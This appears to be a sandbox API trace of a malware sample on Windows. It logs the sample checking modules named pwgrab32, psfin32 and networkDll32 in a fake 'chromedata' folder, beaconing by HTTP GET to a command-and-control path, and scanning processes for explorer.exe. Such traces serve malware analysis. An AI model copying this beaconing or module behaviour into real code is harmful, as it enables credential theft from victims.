	[0231.227] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x24d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0231.227] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x614
	[0231.228] GetFileTime (in: hFile=0x614, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0231.228] CloseHandle (hObject=0x614) returned 1
	[0231.228] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x71aa4120, dwHighDateTime=0x1d50a6a)) 
	[0231.228] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d3b0) returned 1
	[0231.228] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0231.228] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24d3b0
	[0231.228] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x24d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0231.228] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x614
	[0231.228] GetFileTime (in: hFile=0x614, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0231.228] CloseHandle (hObject=0x614) returned 1
	[0231.228] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x71aa4120, dwHighDateTime=0x1d50a6a)) 
	[0231.228] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d3b0) returned 1
	[0231.228] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0231.228] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24d3b0
	[0231.228] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x24d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0231.228] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x614
	[0231.228] GetFileTime (in: hFile=0x614, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0231.228] CloseHandle (hObject=0x614) returned 1
	[0231.228] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x71aa4120, dwHighDateTime=0x1d50a6a)) 
	[0231.228] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d3b0) returned 1
	[0231.228] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0231.228] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24d3b0
	[0231.228] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x24d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0231.228] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x614
	[0231.229] GetFileTime (in: hFile=0x614, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0231.229] CloseHandle (hObject=0x614) returned 1
	[0231.229] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x71aa4120, dwHighDateTime=0x1d50a6a)) 
	[0231.229] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d3b0) returned 1
	[0231.229] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0231.229] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24d3b0
	[0231.229] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x24d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0231.229] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x614
	[0231.229] GetFileTime (in: hFile=0x614, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0231.229] CloseHandle (hObject=0x614) returned 1
	[0231.229] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x71aa4120, dwHighDateTime=0x1d50a6a)) 
	[0231.229] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d3b0) returned 1
	[0231.229] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26ae8c8) returned 1
	[0231.229] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26ae6b0) returned 1
	[0231.229] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745370) returned 1
	[0231.229] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745158) returned 1
	[0231.229] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8998) returned 1
	[0231.229] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0231.229] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef20) returned 1
	[0231.229] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0231.229] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0231.229] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0231.229] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0231.229] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/BUq6Pm6Sj1Ok4Pl8Un8O/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0231.229] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0231.230] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0232.113] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0232.113] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0232.113] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
	[0232.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0232.113] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x22ffe70, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x22ffe70*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0232.113] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0232.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ffe70, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0232.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff930
	[0232.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ffe70, cbMultiByte=3, lpWideCharStr=0x22ff930, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0232.114] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0232.114] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
	[0232.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff948
	[0232.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe58
	[0232.114] lstrcpynW (in: lpString1=0x22ffe58, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0232.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778488
	[0232.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778500) returned 1
	[0232.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe10) returned 1
	[0232.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffc30) returned 1
	[0232.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c8098) returned 1
	[0232.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c71e8) returned 1
	[0232.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778438) returned 1
	[0232.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6490) returned 1
	[0232.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff930) returned 1
	[0232.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff948) returned 1
	[0232.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0232.114] lstrcmpW (lpString1=0x0, lpString2="68975977") returned -1
	[0232.114] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x5f8
	[0232.117] Process32FirstW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0232.118] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0232.118] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0232.119] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0232.119] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0232.120] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0232.120] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0232.121] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0232.121] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0232.122] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0232.122] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0232.123] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0232.123] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0232.124] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0232.124] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0232.124] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0232.124] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0232.125] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0232.125] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0232.126] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0232.126] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.127] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.127] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.128] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.128] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.129] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.129] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.130] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.130] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.131] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.131] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.132] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.132] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.133] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.133] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0232.134] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0232.134] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.134] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.135] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0232.135] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0232.135] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0232.136] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0232.136] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.137] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0232.137] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0232.138] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0232.138] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0232.139] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0232.139] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0232.140] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0232.140] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0232.141] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0232.141] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0232.142] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0232.142] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0232.142] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0232.142] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0232.143] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0232.143] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0232.145] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0232.145] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0232.145] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0232.145] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0232.146] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0232.146] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0232.147] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0232.147] Process32NextW (in: hSnapshot=0x5f8, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0232.148] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
